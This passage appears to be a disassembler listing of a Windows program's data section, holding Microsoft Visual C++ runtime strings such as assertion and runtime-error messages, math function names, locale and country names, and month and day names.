aSNull db 's != NULL',0 ; DATA XREF: __mbstowcs_lk+29�o
align 10h
dword_43DDE0 dd 0FFFFFFFFh ; DATA XREF: start+5�o
dd offset sub_423052
dd offset sub_42306D
a_file_c db '_file.c',0 ; DATA XREF: ___initstdio+31�o
; ___initstdio+65�o
aAssertionFai_1 db 'Assertion Failed',0 ; DATA XREF: .data:00452D0C�o
align 4
aError db 'Error',0 ; DATA XREF: .data:00452D08�o
align 10h
aWarning db 'Warning',0 ; DATA XREF: .data:off_452D04�o
; char aSDS_0[]
aSDS_0 db '%s(%d) : %s',0 ; DATA XREF: __CrtDbgReport+1FF�o
; char asc_43DE24[]
asc_43DE24: ; DATA XREF: __CrtDbgReport:loc_423606�o
dw 0Ah
unicode 0, <>,0
; char asc_43DE28[]
asc_43DE28: ; DATA XREF: __CrtDbgReport+1C2�o
dw 0Dh
unicode 0, <>,0
aAssertionFai_0 db 'Assertion failed!',0 ; DATA XREF: __CrtDbgReport:loc_4235A5�o
align 10h
aAssertionFaile db 'Assertion failed: ',0 ; DATA XREF: __CrtDbgReport+169�o
align 4
; char a_crtdbgreportS[]
a_crtdbgreportS db '_CrtDbgReport: String too long or IO Error',0
; DATA XREF: __CrtDbgReport+149�o
; __CrtDbgReport+21C�o ...
align 10h
aSecondChanceAs db 'Second Chance Assertion Failed: File %s, Line %d',0Ah,0
; DATA XREF: __CrtDbgReport+E6�o
align 4
aWsprintfa db 'wsprintfA',0 ; DATA XREF: __CrtDbgReport+B6�o
align 10h
aUser32_dll_0 db 'user32.dll',0 ; DATA XREF: __CrtDbgReport+9C�o
; ___crtMessageBoxA+16�o
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Debug Library',0
; DATA XREF: _CrtMessageWindow+2C2�o
align 10h
; char aDebugSProgramS[]
aDebugSProgramS db 'Debug %s!',0Ah ; DATA XREF: _CrtMessageWindow+28C�o
db 0Ah
db 'Program: %s%s%s%s%s%s%s%s%s%s%s',0Ah
db 0Ah
db '(Press Retry to debug the application)',0
align 4
aModule db 0Ah ; DATA XREF: _CrtMessageWindow+221�o
db 'Module: ',0
align 10h
aFile_1 db 0Ah ; DATA XREF: _CrtMessageWindow+1E1�o
db 'File: ',0
aLine db 0Ah ; DATA XREF: _CrtMessageWindow+1AA�o
db 'Line: ',0
; char asc_43DF60[]
asc_43DF60 db 0Ah ; DATA XREF: _CrtMessageWindow+173�o
; __NMSG_WRITE+171�o
db 0Ah,0
align 4
aExpression db 'Expression: ',0 ; DATA XREF: _CrtMessageWindow+153�o
align 4
dword_43DF74 dd 0 ; DATA XREF: _CrtMessageWindow:loc_4238DA�o
; _CrtMessageWindow:loc_4238F9�o ...
aForInformation db 0Ah ; DATA XREF: _CrtMessageWindow+10E�o
db 0Ah
db 'For information on how your program can cause an assertion',0Ah
db 'failure, see the Visual C++ documentation on asserts.',0
align 4
; char a___[]
a___ db '...',0 ; DATA XREF: _CrtMessageWindow+9C�o
; _CrtMessageWindow+F4�o ...
; char aProgramNameUnk[]
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: _CrtMessageWindow+56�o
; __NMSG_WRITE+ED�o
align 4
aDbgrpt_c db 'dbgrpt.c',0 ; DATA XREF: _CrtMessageWindow+1F�o
align 4
; char aSzusermessageN[]
aSzusermessageN db 'szUserMessage != NULL',0 ; DATA XREF: _CrtMessageWindow+13�o
align 4
a_freebuf_c db '_freebuf.c',0 ; DATA XREF: __freebuf+15�o
align 4
aMlock_c db 'mlock.c',0 ; DATA XREF: __lock+16�o
dword_43E040 dd 0FFFFFFFFh, 0 ; DATA XREF: __heap_alloc_base+5�o
dd offset sub_424345
dd 0FFFFFFFFh, 0
dd offset sub_4243C7
dword_43E058 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_424440+5�o
dd offset sub_4244E1
dd 0FFFFFFFFh, 0
dd offset sub_4245DA
dword_43E070 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_424650+5�o
dd offset sub_424818
dd 0FFFFFFFFh, 0
dd offset sub_424A2F
dword_43E088 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_424AF0+5�o
dd offset sub_424B6B
dd 0FFFFFFFFh, 0
dd offset sub_424BED
dword_43E0A0 dd 0FFFFFFFFh, 0 ; DATA XREF: unknown_libname_6+5�o
dd offset sub_424CA2
dd 0FFFFFFFFh, 0
dd offset sub_424CE7
; char Str1[]
Str1 db '__GLOBAL_HEAP_SELECTED',0 ; DATA XREF: sub_427AB0+B9�o
align 10h
a__msvcrt_heap_ db '__MSVCRT_HEAP_SELECT',0 ; DATA XREF: sub_427AB0+5A�o
align 4
a_filbuf_c db '_filbuf.c',0 ; DATA XREF: __filbuf+18�o
align 4
a_open_c db '_open.c',0 ; DATA XREF: __openfile+2E�o
; __openfile+58�o ...
; char aFilenameNull[]
aFilenameNull db 'filename != NULL',0 ; DATA XREF: __openfile+25�o
align 10h
aStream_c db 'stream.c',0 ; DATA XREF: __getstream+C1�o
align 4
; char aInconsistentIo[]
aInconsistentIo db '("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)',0
; DATA XREF: __flsbuf+162�o
align 4
a_flsbuf_c db '_flsbuf.c',0 ; DATA XREF: __flsbuf+18�o
; __flsbuf+16E�o
align 4
byte_43E168 db 6 ; DATA XREF: sub_428D80+96�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
db 8,'`h````',0
dd 78707000h, 8787878h, 807h, 8080007h, 8000008h, 7000800h
dd 8
aNull_0: ; DATA XREF: .data:off_455020�o
unicode 0, <(null)>,0
align 4
aNull db '(null)',0 ; DATA XREF: .data:off_45501C�o
align 4
aOutput_c db 'output.c',0 ; DATA XREF: sub_428D80+129�o
; sub_428D80+6A2�o
align 4
; char aCh_t0[]
aCh_t0 db 'ch != _T(',27h,'\0',27h,')',0 ; DATA XREF: sub_428D80+11D�o
align 4
aTidtable_c db 'tidtable.c',0 ; DATA XREF: __mtinit+23�o __getptd+29�o
align 4
a_sftbuf_c db '_sftbuf.c',0 ; DATA XREF: __stbuf+18�o __stbuf+B2�o ...
align 10h
; char aFlag0Flag1[]
aFlag0Flag1 db 'flag == 0 || flag == 1',0 ; DATA XREF: __ftbuf+13�o
align 4
aInput_c db 'input.c',0 ; DATA XREF: unknown_libname_7+1E�o
; unknown_libname_7+4B�o
a_yn db '_yn',0 ; DATA XREF: .data:0045536C�o
a_y1 db '_y1',0 ; DATA XREF: .data:00455364�o
a_y0 db '_y0',0 ; DATA XREF: .data:0045535C�o
aFrexp db 'frexp',0 ; DATA XREF: .data:00455354�o
align 4
aFmod db 'fmod',0 ; DATA XREF: .data:0045534C�o
align 4
a_hypot db '_hypot',0 ; DATA XREF: .data:off_455344�o
align 4
a_cabs db '_cabs',0 ; DATA XREF: .data:0045533C�o
align 4
aLdexp db 'ldexp',0 ; DATA XREF: .data:00455334�o
align 4
aModf db 'modf',0 ; DATA XREF: .data:0045532C�o
align 4
aFabs db 'fabs',0 ; DATA XREF: .data:00455324�o
align 4
aFloor db 'floor',0 ; DATA XREF: .data:0045531C�o
align 4
aCeil db 'ceil',0 ; DATA XREF: .data:00455314�o
align 4
aTan db 'tan',0 ; DATA XREF: .data:0045530C�o
aCos db 'cos',0 ; DATA XREF: .data:00455304�o
aSin db 'sin',0 ; DATA XREF: .data:004552FC�o
aSqrt db 'sqrt',0 ; DATA XREF: .data:004552F4�o
align 4
aAtan2 db 'atan2',0 ; DATA XREF: .data:004552EC�o
align 10h
aAtan db 'atan',0 ; DATA XREF: .data:004552E4�o
align 4
aAcos db 'acos',0 ; DATA XREF: .data:004552DC�o
align 10h
aAsin db 'asin',0 ; DATA XREF: .data:004552D4�o
align 4
aTanh db 'tanh',0 ; DATA XREF: .data:004552CC�o
align 10h
aCosh db 'cosh',0 ; DATA XREF: .data:004552C4�o
align 4
aSinh db 'sinh',0 ; DATA XREF: .data:004552BC�o
align 10h
aLog10 db 'log10',0 ; DATA XREF: .data:004552B4�o
align 4
aLog_0 db 'log',0 ; DATA XREF: .data:004552AC�o
aPow db 'pow',0 ; DATA XREF: .data:004552A4�o
aExp db 'exp',0 ; DATA XREF: .data:off_45529C�o
align 8
dbl_43E2E8 dq 0.0 ; DATA XREF: __handle_exc+D7�r
; __handle_exc+11A�r ...
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: __ms_p5_mp_test_fdiv+1A�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: __ms_p5_mp_test_fdiv+6�o
align 4
; char aE000[]
aE000 db 'e+000',0 ; DATA XREF: __cftoe2:loc_42D638�o
align 10h
dword_43E320 dd 0FFFFFFFFh ; DATA XREF: ___FrameUnwindToState+5�o
dd offset loc_42E069
dd offset loc_42E076
align 10h
dword_43E330 dd 0FFFFFFFFh, 0 ; DATA XREF: CallCatchBlock(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,_s_FuncInfo const *,void *,int,ulong)+5�o
dd offset sub_42E29D
align 10h
dd offset loc_42E25E
dd offset loc_42E26B
dword_43E348 dd 0FFFFFFFFh ; DATA XREF: BuildCatchObject(EHExceptionRecord *,EHRegistrationNode *,_s_HandlerType const *,_s_CatchableType const *)+5�o
dd offset loc_42E5BC
dd offset loc_42E5C2
align 8
dword_43E358 dd 0FFFFFFFFh ; DATA XREF: _DestructExceptionObject(EHExceptionRecord *,uchar)+5�o
dd offset loc_42E63E
dd offset loc_42E64D
align 8
dword_43E368 dd 0FFFFFFFFh, 0 ; DATA XREF: terminate(void)+5�o
dd offset j__abort
align 8
dd offset loc_42E760
dd offset loc_42E766
dword_43E380 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_42E7C0+5�o
dd offset j_?terminate@@YAXXZ ; terminate(void)
align 10h
dd offset loc_42E80C
dd offset loc_42E812
aLc_time db 'LC_TIME',0 ; DATA XREF: .data:0045551C�o
aLc_numeric db 'LC_NUMERIC',0 ; DATA XREF: .data:00455510�o
align 4
aLc_monetary db 'LC_MONETARY',0 ; DATA XREF: .data:00455504�o
aLc_ctype db 'LC_CTYPE',0 ; DATA XREF: .data:004554F8�o
align 4
aLc_collate db 'LC_COLLATE',0 ; DATA XREF: .data:004554EC�o
align 10h
aLc_all db 'LC_ALL',0 ; DATA XREF: .data:off_4554E0�o
align 4
; char asc_43E3D8[]
asc_43E3D8 db ';',0 ; DATA XREF: _setlocale:loc_42EAF3�o
; __setlocale_get_all+83�o
align 4
asc_43E3DC db '=;',0 ; DATA XREF: _setlocale:loc_42EA21�o
align 10h
aSetlocal_c db 'setlocal.c',0 ; DATA XREF: __setlocale_set_cat+3E�o
; __setlocale_get_all+1B�o
align 4
asc_43E3EC: ; DATA XREF: __setlocale_get_all+5B�o
unicode 0, <=>,0
; char Control[]
Control db '_.,',0 ; DATA XREF: ___lc_strtolc:loc_42F232�o
; char a__4[]
a__4: ; DATA XREF: ___lc_lctostr+50�o
; ___init_numeric:loc_43539B�o
unicode 0, <.>,0
a__5: ; DATA XREF: ___lc_lctostr+25�o
unicode 0, <_>,0
aFtell_c db 'ftell.c',0 ; DATA XREF: _ftell+16�o __ftell_lk+18�o
dword_43E404 dd 0 ; DATA XREF: ___crtLCMapStringA+5D�o
; ___crtGetStringTypeA+58�o ...
dword_43E408 dd 2 dup(0) ; DATA XREF: ___crtLCMapStringA+35�o
; ___crtGetStringTypeA+35�o ...
dword_43E410 dd 0FFFFFFFFh ; DATA XREF: ___crtLCMapStringA+5�o
dd offset loc_42FC46
dd offset loc_42FC4C
dd 0FFFFFFFFh
dd offset loc_42FD3C
dd offset loc_42FD42
aStdenvp_c db 'stdenvp.c',0 ; DATA XREF: __setenvp+5B�o
; __setenvp+D0�o
align 4
aStdargv_c db 'stdargv.c',0 ; DATA XREF: __setargv+72�o
align 10h
aA_env_c db 'a_env.c',0 ; DATA XREF: ___crtGetEnvironmentStringsA+E8�o
; ___crtGetEnvironmentStringsA+1C6�o
aIoinit_c db 'ioinit.c',0 ; DATA XREF: __ioinit+B�o __ioinit+106�o
align 4
aRuntimeError db 'runtime error ',0 ; DATA XREF: .data:00455664�o
align 4
asc_43E464 db 0Dh,0Ah,0 ; DATA XREF: .data:0045565C�o
align 4
aTlossError db 'TLOSS error',0Dh,0Ah,0 ; DATA XREF: .data:00455654�o
align 4
aSingError db 'SING error',0Dh,0Ah,0 ; DATA XREF: .data:0045564C�o
align 4
aDomainError db 'DOMAIN error',0Dh,0Ah,0 ; DATA XREF: .data:00455644�o
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah ; DATA XREF: .data:0045563C�o
db '- unable to initialize heap',0Dh,0Ah,0
align 10h
aR6027NotEnough db 'R6027',0Dh,0Ah ; DATA XREF: .data:00455634�o
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah ; DATA XREF: .data:0045562C�o
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 10h
aR6025PureVirtu db 'R6025',0Dh,0Ah ; DATA XREF: .data:00455624�o
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah ; DATA XREF: .data:0045561C�o
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 10h
aR6019UnableToO db 'R6019',0Dh,0Ah ; DATA XREF: .data:00455614�o
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah ; DATA XREF: .data:0045560C�o
db '- unexpected heap error',0Dh,0Ah,0
align 10h
aR6017Unexpecte db 'R6017',0Dh,0Ah ; DATA XREF: .data:00455604�o
db '- unexpected multithread lock error',0Dh,0Ah,0
align 10h
aR6016NotEnough db 'R6016',0Dh,0Ah ; DATA XREF: .data:004555FC�o
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah ; DATA XREF: .data:004555F4�o
db 'abnormal program termination',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah ; DATA XREF: .data:004555EC�o
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah ; DATA XREF: .data:004555E4�o
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_4555DC�o
db '- floating point not loaded',0Dh,0Ah,0
align 10h
aMicrosoftVis_0 db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: __NMSG_WRITE+1A4�o
align 4
; char aRuntimeErrorPr[]
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE:loc_430F2A�o
db 0Ah
db 'Program: ',0
align 4
aWinsig_c db 'winsig.c',0 ; DATA XREF: .text:00431501�o
align 10h
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: ___crtMessageBoxA+5F�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: ___crtMessageBoxA:loc_43199B�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: ___crtMessageBoxA+2A�o
aOsfinfo_c db 'osfinfo.c',0 ; DATA XREF: __alloc_osfhnd+138�o
align 10h
dword_43E770 dd 0FFFFFFFFh ; DATA XREF: ___crtGetStringTypeA+5�o
dd offset loc_432204
dd offset loc_43220A
a_getbuf_c db '_getbuf.c',0 ; DATA XREF: __getbuf+16�o __getbuf+48�o
align 4
aMbtowc_c db 'mbtowc.c',0 ; DATA XREF: __mbtowc_lk+21�o
align 4
; char aMb_cur_max1Mb_[]
aMb_cur_max1Mb_ db 'MB_CUR_MAX == 1 || MB_CUR_MAX == 2',0 ; DATA XREF: __mbtowc_lk+18�o
align 4
aUngetc_c db 'ungetc.c',0 ; DATA XREF: _ungetc+16�o _ungetc_0+16�o
align 4
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 4
aTzset_c db 'tzset.c',0 ; DATA XREF: __tzset_lk+1D1�o
; char VarName[]
VarName db 'TZ',0 ; DATA XREF: __tzset_lk+35�o
align 10h
aInittime_c db 'inittime.c',0 ; DATA XREF: ___init_time+13�o
align 4
aInitnum_c db 'initnum.c',0 ; DATA XREF: ___init_numeric+1CF�o
; ___init_numeric+215�o ...
align 4
aInitmon_c db 'initmon.c',0 ; DATA XREF: ___init_monetary+13�o
align 4
aInitctyp_c db 'initctyp.c',0 ; DATA XREF: unknown_libname_24+52�o
; unknown_libname_24+6B�o ...
align 10h
aParaguay db 'Paraguay',0 ; DATA XREF: .data:00455C5C�o
align 4
aUruguay db 'Uruguay',0 ; DATA XREF: .data:00455C30�o
aChile db 'Chile',0 ; DATA XREF: .data:00455C04�o
align 4
aEcuador db 'Ecuador',0 ; DATA XREF: .data:00455BD8�o
aArgentina db 'Argentina',0 ; DATA XREF: .data:00455BAC�o
align 10h
aPeru db 'Peru',0 ; DATA XREF: .data:00455B80�o
align 4
aColombia db 'Colombia',0 ; DATA XREF: .data:00455B54�o
align 4
aVenezuela db 'Venezuela',0 ; DATA XREF: .data:00455B28�o
align 10h
aDominicanRepub db 'Dominican Republic',0 ; DATA XREF: .data:00455AFC�o
align 4
aSouthAfrica db 'South Africa',0 ; DATA XREF: .data:00455AD0�o
align 4
aPanama db 'Panama',0 ; DATA XREF: .data:00455AA4�o
align 4
aLuxembourg db 'Luxembourg',0 ; DATA XREF: .data:00455A78�o
align 4
aCostaRica db 'Costa Rica',0 ; DATA XREF: .data:00455A4C�o
align 4
aSwitzerland db 'Switzerland',0 ; DATA XREF: .data:00455A20�o
aGuatemala db 'Guatemala',0 ; DATA XREF: .data:004559F4�o
align 4
aCanada db 'Canada',0 ; DATA XREF: .data:004559C8�o
align 4
aSpanishModernS db 'Spanish - Modern Sort',0 ; DATA XREF: .data:00455994�o
align 4
aAustralia db 'Australia',0 ; DATA XREF: .data:00455970�o
align 4
aEnglish db 'English',0 ; DATA XREF: .data:00455968�o
; .data:00455AC8�o
aAustria db 'Austria',0 ; DATA XREF: .data:00455944�o
aGerman db 'German',0 ; DATA XREF: .data:0045593C�o
align 10h
aBelgium db 'Belgium',0 ; DATA XREF: .data:00455918�o
aMexico db 'Mexico',0 ; DATA XREF: .data:004558EC�o
align 10h
aSpanish db 'Spanish',0 ; DATA XREF: .data:004558E4�o
; .data:004559EC�o ...
aBasque db 'Basque',0 ; DATA XREF: .data:004558B8�o
align 10h
aSweden db 'Sweden',0 ; DATA XREF: .data:00455894�o
align 4
aSwedish db 'Swedish',0 ; DATA XREF: .data:0045588C�o
aIceland db 'Iceland',0 ; DATA XREF: .data:00455868�o
aIcelandic db 'Icelandic',0 ; DATA XREF: .data:00455860�o
align 4
aFrance db 'France',0 ; DATA XREF: .data:0045583C�o
align 4
aFrench db 'French',0 ; DATA XREF: .data:00455834�o
; .data:00455910�o ...
align 4
aFinland db 'Finland',0 ; DATA XREF: .data:00455810�o
aFinnish db 'Finnish',0 ; DATA XREF: .data:00455808�o
aSpain db 'Spain',0 ; DATA XREF: .data:off_4557E4�o
; .data:004558C0�o ...
align 4
aSpanishTraditi db 'Spanish - Traditional Sort',0 ; DATA XREF: .data:off_4557DC�o
align 4
aUnitedStates db 'united-states',0 ; DATA XREF: .data:00455D30�o
align 4
aUnitedKingdom db 'united-kingdom',0 ; DATA XREF: .data:00455D28�o
align 4
aTrinidadTobago db 'trinidad & tobago',0 ; DATA XREF: .data:00455D18�o
align 4
aSouthKorea db 'south-korea',0 ; DATA XREF: .data:00455D10�o
aSouthAfrica_0 db 'south-africa',0 ; DATA XREF: .data:00455D08�o
align 4
aSouthKorea_0 db 'south korea',0 ; DATA XREF: .data:00455D00�o
aSouthAfrica_1 db 'south africa',0 ; DATA XREF: .data:00455CF8�o
align 4
aSlovak db 'slovak',0 ; DATA XREF: .data:00455CF0�o
align 4
aPuertoRico db 'puerto-rico',0 ; DATA XREF: .data:00455CE8�o
aPrChina db 'pr-china',0 ; DATA XREF: .data:00455CE0�o
align 4
aPrChina_0 db 'pr china',0 ; DATA XREF: .data:00455CD8�o
align 10h
aNz db 'nz',0 ; DATA XREF: .data:00455CD0�o
align 4
aNewZealand db 'new-zealand',0 ; DATA XREF: .data:00455CC8�o
aHongKong db 'hong-kong',0 ; DATA XREF: .data:00455CC0�o
align 4
aHolland db 'holland',0 ; DATA XREF: .data:00455CB8�o
aGreatBritain db 'great britain',0 ; DATA XREF: .data:00455CB0�o
align 4
aEngland db 'england',0 ; DATA XREF: .data:00455CA8�o
aCzech db 'czech',0 ; DATA XREF: .data:00455CA0�o
align 4
aChina db 'china',0 ; DATA XREF: .data:00455C98�o
align 4
aBritain db 'britain',0 ; DATA XREF: .data:00455C90�o
aAmerica db 'america',0 ; DATA XREF: .data:off_455C88�o
aUsa db 'usa',0 ; DATA XREF: .data:00455F40�o
aUs db 'us',0 ; DATA XREF: .data:00455D38�o
; .data:00455F38�o
align 4
aUk db 'uk',0 ; DATA XREF: .data:00455D20�o
; .data:00455F30�o
align 4
aSwiss db 'swiss',0 ; DATA XREF: .data:00455F28�o
align 10h
aSwedishFinland db 'swedish-finland',0 ; DATA XREF: .data:00455F20�o
aSpanishVenezue db 'spanish-venezuela',0 ; DATA XREF: .data:00455F18�o
align 4
aSpanishUruguay db 'spanish-uruguay',0 ; DATA XREF: .data:00455F10�o
aSpanishPuertoR db 'spanish-puerto rico',0 ; DATA XREF: .data:00455F08�o
aSpanishPeru db 'spanish-peru',0 ; DATA XREF: .data:00455F00�o
align 4
aSpanishParagua db 'spanish-paraguay',0 ; DATA XREF: .data:00455EF8�o
align 4
aSpanishPanama db 'spanish-panama',0 ; DATA XREF: .data:00455EF0�o
align 4
aSpanishNicarag db 'spanish-nicaragua',0 ; DATA XREF: .data:00455EE8�o
align 10h
aSpanishModern db 'spanish-modern',0 ; DATA XREF: .data:00455EE0�o
align 10h
aSpanishMexican db 'spanish-mexican',0 ; DATA XREF: .data:00455ED8�o
aSpanishHondura db 'spanish-honduras',0 ; DATA XREF: .data:00455ED0�o
align 4
aSpanishGuatema db 'spanish-guatemala',0 ; DATA XREF: .data:00455EC8�o
align 4
aSpanishElSalva db 'spanish-el salvador',0 ; DATA XREF: .data:00455EC0�o
aSpanishEcuador db 'spanish-ecuador',0 ; DATA XREF: .data:00455EB8�o
aSpanishDominic db 'spanish-dominican republic',0 ; DATA XREF: .data:00455EB0�o
align 4
aSpanishCostaRi db 'spanish-costa rica',0 ; DATA XREF: .data:00455EA8�o
align 4
aSpanishColombi db 'spanish-colombia',0 ; DATA XREF: .data:00455EA0�o
align 10h
aSpanishChile db 'spanish-chile',0 ; DATA XREF: .data:00455E98�o
align 10h
aSpanishBolivia db 'spanish-bolivia',0 ; DATA XREF: .data:00455E90�o
aSpanishArgenti db 'spanish-argentina',0 ; DATA XREF: .data:00455E88�o
align 4
aPortugueseBraz db 'portuguese-brazilian',0 ; DATA XREF: .data:00455E80�o
align 4
aNorwegianNynor db 'norwegian-nynorsk',0 ; DATA XREF: .data:00455E78�o
align 10h
aNorwegianBokma db 'norwegian-bokmal',0 ; DATA XREF: .data:00455E70�o
align 4
aNorwegian db 'norwegian',0 ; DATA XREF: .data:00455E68�o
align 10h
aItalianSwiss db 'italian-swiss',0 ; DATA XREF: .data:00455E60�o
align 10h
aIrishEnglish db 'irish-english',0 ; DATA XREF: .data:00455E58�o
align 10h
aGermanSwiss db 'german-swiss',0 ; DATA XREF: .data:00455E50�o
align 10h
aGermanLuxembou db 'german-luxembourg',0 ; DATA XREF: .data:00455E48�o
align 4
aGermanLichtens db 'german-lichtenstein',0 ; DATA XREF: .data:00455E40�o
aGermanAustrian db 'german-austrian',0 ; DATA XREF: .data:00455E38�o
aFrenchSwiss db 'french-swiss',0 ; DATA XREF: .data:00455E30�o
align 4
aFrenchLuxembou db 'french-luxembourg',0 ; DATA XREF: .data:00455E28�o
align 4
aFrenchCanadian db 'french-canadian',0 ; DATA XREF: .data:00455E20�o
aFrenchBelgian db 'french-belgian',0 ; DATA XREF: .data:00455E18�o
align 4
aEnglishUsa db 'english-usa',0 ; DATA XREF: .data:00455E10�o
aEnglishUs db 'english-us',0 ; DATA XREF: .data:00455E08�o
align 4
aEnglishUk db 'english-uk',0 ; DATA XREF: .data:00455E00�o
align 10h
aEnglishTrinida db 'english-trinidad y tobago',0 ; DATA XREF: .data:00455DF8�o
align 4
aEnglishSouthAf db 'english-south africa',0 ; DATA XREF: .data:00455DF0�o
align 4
aEnglishNz db 'english-nz',0 ; DATA XREF: .data:00455DE8�o
align 10h
aEnglishJamaica db 'english-jamaica',0 ; DATA XREF: .data:00455DE0�o
aEnglishIre db 'english-ire',0 ; DATA XREF: .data:00455DD8�o
aEnglishCaribbe db 'english-caribbean',0 ; DATA XREF: .data:00455DD0�o
align 10h
aEnglishCan db 'english-can',0 ; DATA XREF: .data:00455DC8�o
aEnglishBelize db 'english-belize',0 ; DATA XREF: .data:00455DC0�o
align 4
aEnglishAus db 'english-aus',0 ; DATA XREF: .data:00455DB8�o
aEnglishAmerica db 'english-american',0 ; DATA XREF: .data:00455DB0�o
align 4
aDutchBelgian db 'dutch-belgian',0 ; DATA XREF: .data:00455DA8�o
align 4
aChineseTraditi db 'chinese-traditional',0 ; DATA XREF: .data:00455DA0�o
aChineseSingapo db 'chinese-singapore',0 ; DATA XREF: .data:00455D98�o
align 4
aChineseSimplif db 'chinese-simplified',0 ; DATA XREF: .data:00455D90�o
align 4
aChineseHongkon db 'chinese-hongkong',0 ; DATA XREF: .data:00455D88�o
align 4
aChinese db 'chinese',0 ; DATA XREF: .data:00455D80�o
aChi db 'chi',0 ; DATA XREF: .data:00455D78�o
aChh db 'chh',0 ; DATA XREF: .data:00455D70�o
aCanadian db 'canadian',0 ; DATA XREF: .data:00455D68�o
align 4
aBelgian db 'belgian',0 ; DATA XREF: .data:00455D60�o
aAustralian db 'australian',0 ; DATA XREF: .data:00455D58�o
align 4
aAmericanEnglis db 'american-english',0 ; DATA XREF: .data:00455D50�o
align 10h
aAmericanEngl_0 db 'american english',0 ; DATA XREF: .data:00455D48�o
align 4
aAmerican db 'american',0 ; DATA XREF: .data:off_455D40�o
align 10h
; char aOcp[]
aOcp db 'OCP',0 ; DATA XREF: _ProcessCodePage:loc_436703�o
; char aAcp[]
aAcp db 'ACP',0 ; DATA XREF: _ProcessCodePage+16�o
aChsize_c db 'chsize.c',0 ; DATA XREF: __chsize_lk+38�o
align 4
; char aSize0[]
aSize0 db 'size >= 0',0 ; DATA XREF: __chsize_lk+2C�o
align 10h
; char a1Qnan[]
a1Qnan db '1#QNAN',0 ; DATA XREF: _$I10_OUTPUT:loc_437FDF�o
align 4
; char a1Inf[]
a1Inf db '1#INF',0 ; DATA XREF: _$I10_OUTPUT+19B�o
align 10h
; char a1Ind[]
a1Ind db '1#IND',0 ; DATA XREF: _$I10_OUTPUT+168�o
align 4
; char a1Snan[]
a1Snan db '1#SNAN',0 ; DATA XREF: _$I10_OUTPUT+125�o
align 10h
aHMmSs db 'H:mm:ss',0 ; DATA XREF: .data:00455FF8�o
aDdddMmmmDdYyyy db 'dddd, MMMM dd, yyyy',0 ; DATA XREF: .data:00455FF4�o
aMDYy db 'M/d/yy',0 ; DATA XREF: .data:00455FF0�o
align 4
aPm_2 db 'PM',0 ; DATA XREF: .data:00455FEC�o
align 4
aAm_0 db 'AM',0 ; DATA XREF: .data:00455FE8�o
align 4
aDecember db 'December',0 ; DATA XREF: .data:00455FE4�o
align 4
aNovember db 'November',0 ; DATA XREF: .data:00455FE0�o
align 4
aOctober db 'October',0 ; DATA XREF: .data:00455FDC�o
aSeptember db 'September',0 ; DATA XREF: .data:00455FD8�o
align 4
aAugust db 'August',0 ; DATA XREF: .data:00455FD4�o
align 10h
aJuly db 'July',0 ; DATA XREF: .data:00455FD0�o
align 4
aJune db 'June',0 ; DATA XREF: .data:00455FCC�o
align 10h
aApril db 'April',0 ; DATA XREF: .data:00455FC4�o
align 4
aMarch db 'March',0 ; DATA XREF: .data:00455FC0�o
align 10h
aFebruary db 'February',0 ; DATA XREF: .data:00455FBC�o
align 4
aJanuary db 'January',0 ; DATA XREF: .data:00455FB8�o
aDec db 'Dec',0 ; DATA XREF: .data:00455FB4�o
aNov db 'Nov',0 ; DATA XREF: .data:00455FB0�o
aOct db 'Oct',0 ; DATA XREF: .data:00455FAC�o
aSep db 'Sep',0 ; DATA XREF: .data:00455FA8�o
aAug db 'Aug',0 ; DATA XREF: .data:00455FA4�o
aJul db 'Jul',0 ; DATA XREF: .data:00455FA0�o
aJun db 'Jun',0 ; DATA XREF: .data:00455F9C�o
aMay db 'May',0 ; DATA XREF: .data:00455F98�o
; .data:00455FC8�o
aApr db 'Apr',0 ; DATA XREF: .data:00455F94�o
aMar db 'Mar',0 ; DATA XREF: .data:00455F90�o
aFeb db 'Feb',0 ; DATA XREF: .data:00455F8C�o
aJan db 'Jan',0 ; DATA XREF: .data:00455F88�o
aSaturday db 'Saturday',0 ; DATA XREF: .data:00455F84�o
align 10h
aFriday db 'Friday',0 ; DATA XREF: .data:00455F80�o
align 4
aThursday db 'Thursday',0 ; DATA XREF: .data:00455F7C�o
align 4
aWednesday db 'Wednesday',0 ; DATA XREF: .data:00455F78�o
align 10h
aTuesday db 'Tuesday',0 ; DATA XREF: .data:00455F74�o
aMonday db 'Monday',0 ; DATA XREF: .data:00455F70�o
align 10h
aSunday db 'Sunday',0 ; DATA XREF: .data:00455F6C�o
align 4
aSat db 'Sat',0 ; DATA XREF: .data:00455F68�o
aFri db 'Fri',0 ; DATA XREF: .data:00455F64�o
aThu db 'Thu',0 ; DATA XREF: .data:00455F60�o
